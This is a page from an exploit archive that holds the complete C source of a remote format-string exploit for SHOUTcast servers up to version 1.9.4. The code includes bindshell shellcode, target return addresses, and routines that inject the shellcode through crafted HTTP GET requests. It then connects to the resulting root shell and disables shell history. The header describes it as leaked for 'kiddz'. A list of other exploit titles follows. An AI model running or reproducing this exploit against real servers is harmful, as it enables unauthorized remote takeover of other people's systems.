exploits , vulnerabilities , articles , SHOUTcast <= 1.9.4 HTTP GET Filename Request Remote Format String Exploit

2006-01-28

SHOUTcast <= 1.9.4 HTTP GET Filename Request Remote Format String Exploit

Rated as : Critical 
Solution : Upgrade to version 1.9.5

/*
* ___ ___ ___ _/ _/__ ___ __/ / /_
* (_-</ -_) _ `/ _/ _ `/ // / / __/
* /___/\__/\_, /_/ \_,_/\_,_/_/\__/.ch
* /___/ 
* 
* [i] Title: Shoutcast <= 1.9.4
* [i] Exploit: simon & kSh
* [i] Info: Leaked, Have fun kiddz
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdarg.h>
#include <signal.h> 

#define SHELL_PORT 7000
#define SHELL_COMMAND "unset HISTFILE; uname -a; id;"


#if 1
unsigned char shellcode[] = /* NOP's + bindshell (7000) (Unknown) */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 
#endif


struct targ{
char *platform;
int retloc; 
int retaddr;
int dpa_offset;

} targets[]= {
{ "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 }, 
{ "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe,
2534 }, 
// dpa offset stolen from coki and tal0n's exploit
{ "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe,
2536 },
{ NULL }
};


void usage(char *a){
int i;

printf("[-] Usage: %s -h <host> [options]\n", a);
printf("[!] Options:\n");
printf("\t\t-h\tHostname you want attack (required)\n");
printf("\t\t-p\tPort of the shoutcast (default: 8000)\n");
printf("\t\t-t\tTarget (default: 0)\n");
printf("\t\t-s\tsleep time to connect (default: 1)\n");
printf("\t\t-S\tsleep time to write memory (default: 7)\n"); 
printf("[!] Targets:\n");
for(i = 0; targets[i].platform; i++)
printf("\t\t%d\t %s\n", i, targets[i].platform);
exit(1);
}


int sockprintf(int sock, const char *s, ...){
char *ptr;
int bytes;
va_list arg;
va_start(arg, s);
if(vasprintf(&ptr, s, arg) == -1){
free(ptr);
return -1;
}
va_end(arg);

bytes = send(sock, ptr, strlen(ptr), 0);
free(ptr);
return bytes;
}


int resolv(struct sockaddr_in *addr, char *hostn){
struct hostent *host;

if (!inet_aton(hostn, &addr->sin_addr)){
host = gethostbyname(hostn);
if (host == NULL){
printf("[-] Wasnt able to resolve %s!\n", hostn);
return -1;
}
addr->sin_addr = *(struct in_addr*)host->h_addr;
}
return 0;
}


int conn(struct sockaddr_in addr, int port){
int sock;

if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){
return -1;
}

addr.sin_port = htons(port);
addr.sin_family = AF_INET;

if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
return -1;
}
return sock;
}


int get_shell(struct sockaddr_in addr, int port, int sleeps){
int sock;
char buffer[1024];
fd_set fds;

signal(SIGINT, SIG_IGN);

sleep(sleeps);

if((sock = conn(addr, port)) == -1)
return (-1);
printf("[+] Wooohooo we got a shell!\n");
sockprintf(sock, SHELL_COMMAND"\r\n");
while(1){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);

if (select(255, &fds, NULL, NULL, NULL) == -1){
fprintf(stderr,"[-] sending failed\n");
close(sock);
exit(1);
}

memset(buffer, 0x0, sizeof(buffer));
if (FD_ISSET(sock, &fds)){
if (recv(sock, buffer, sizeof(buffer), 0) == -1){
fprintf(stderr, "[-] Connection closed by remote host!\n");
close(sock);
exit(1);
}
fprintf(stderr, "%s", buffer);
}

if (FD_ISSET(0, &fds)){
read(0, buffer, sizeof(buffer));
write(sock, buffer, strlen(buffer));
}
}
return 0;
}


void status(int i, int retloc){
static int c=1;

switch(c){
case 1:
printf("[|] ");
break;
case 2:
printf("[/] ");
break;
case 3:
printf("[-] ");
break;
case 4:
printf("[\\] ");
c = 0;
break;
}
printf("Uploading shellcode[%d] to [%p]\r", i, (void *)retloc);
fflush(stdout);
c++;
}


int write_shellcode(struct sockaddr_in addr, int port, int target, int
wsleeps){
char buffer[1024];
int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock;

targets[target].retaddr = retloc;

for(i = 0; i < strlen(shellcode); i++, retloc++){
if((sock = conn(addr, port)) == -1)
return -1;

status(i, retloc);

*((void **)(buffer)) = (void *)((retloc));
buffer[4] = 0x0;
sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n",
buffer);

close(sock);

if(shellcode[i] > 9)
snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i],
targets[target].dpa_offset);
else {
memset(buffer, 0x41, shellcode[i]);
snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn",
targets[target].dpa_offset);
}

if((sock = conn(addr, port)) == -1)
return -1;

sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n",
buffer);
close(sock);
// sleep(1);
usleep(wsleeps * 100000);
}
return 0;

}


int get_target(struct sockaddr_in addr, int port){
char buffer[1024], *ptr, *ptr2;
int sock, bytes;

if((sock = conn(addr, port)) == -1){
printf("failed!\r[-]\n"); 
return -2;
} 
printf("done!\n");

sockprintf(sock, "GET /doesntmatter HTTP/1.1\r\n\r\n");

if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){
printf("[-] Wasnt able to determine version of server, do it
yourself!\n");
return -1;
}
buffer[bytes] = 0x0;

if(!(ptr = strstr(buffer, "<BR>"))){
printf("[-] Wasnt able to determine version of server, do it
yourself!\n"); 
return -1;
}
ptr += 4;
if(!(ptr2 = strstr(ptr, "<BR>"))){
printf("[-] Wasnt able to determine version of server, do it
yourself!\n"); 
return -1;
}
*ptr2 = 0x0;

printf("[!] Version: %s\n", ptr);

if(strstr(ptr, "Server/Linux v1.9.4"))
return 1;
else if(strstr(ptr, "Server/Linux v1.9.2"))
return 2;
else if(strstr(ptr, "Server/FreeBSD")){ 
printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x
choose the target yourself!\n");
return -1;
} else {
printf("[-] Wasnt able to find target for this server!\n");
return -1;
}

return -1;
}


int main(int argc, char **argv){
char *hostn = NULL, buffer[1024];
int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps
= 1, wsleeps = 7;
unsigned short ret1, ret2;
struct sockaddr_in addr;

printf(" ___ ___ ___| _|___ _ _| | |_ \n");
printf("|_ -| -_| . | _| .'| | | | _| \n");
printf("|___|___|_ |_| |__,|___|_|_|.ch\n");
printf(" |___| \n");
printf("Shoutcast <= 1.9.4 Exploit\n");

if (argc < 2)
usage(argv[0]);

while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){
switch (opt){
case 'h':
hostn = optarg;
break;
case 'p':
port = atoi(optarg);
if(port > 65535 || port < 1){
printf("[-] Port %d is invalid\n",port);
return 1;
}
break;
case 't':
target = atoi(optarg);
for(i = 0; targets[i].platform; i++);
if(target >= i){
printf("[-] Wtf are you trying to target?\n");
usage(argv[0]);
}
break;
case 's': 
sleeps = atoi(optarg);
break;
case 'S': 
wsleeps = atoi(optarg);
break;
default:
usage(argv[0]);
}
}

if(hostn == NULL)
usage(argv[0]);

resolv(&addr, hostn);

printf("[!] Connecting to target... ");
fflush(stdout);
if(target == 0){
if((target = get_target(addr, port)) < 0)
return target;
} else 
if(get_target(addr, port) == -2)
exit(-2);

printf("[!] Targeting: %s\n", targets[target].platform);


if(write_shellcode(addr, port, target, wsleeps) != -1)
printf("[+]\n[+] Uploaded shellcode succesful\n");
else {
printf("[-]\n[-] Wasn't able to upload shellcode, server probably
crashed!\n");
return -1;
}

printf("[!] Writing retaddr [%p] to retloc [%p]\n", (void
*)targets[target].retaddr, 
(void *)targets[target].retloc);


if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!\n");
return -1;
}
memset(buffer, 0x0, sizeof(buffer));
*((void **)(buffer)) = (void *)(targets[target].retloc);
*((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2);
sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n",
buffer);
close(sock);

ret1 = (targets[target].retaddr & 0xffff0000) >> 16;
ret2 = (targets[target].retaddr & 0x0000ffff);

snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", 
ret1, targets[target].dpa_offset + 1, (ret2 - ret1),
targets[target].dpa_offset);

if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!\n");
return -1;
}
sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n",
buffer);

if(get_shell(addr, shell_port, sleeps) == -1){
printf("[-] Exploit failed\n");
return -1;
}
return 1;
}
securitydot.net - 2006-01-28

Exploits - newest 10 RSS | More

2007-06-15 32063 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 15839 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 18730 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 16668 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 10089 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 8507 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 10443 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 8558 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 18771 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 9022 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit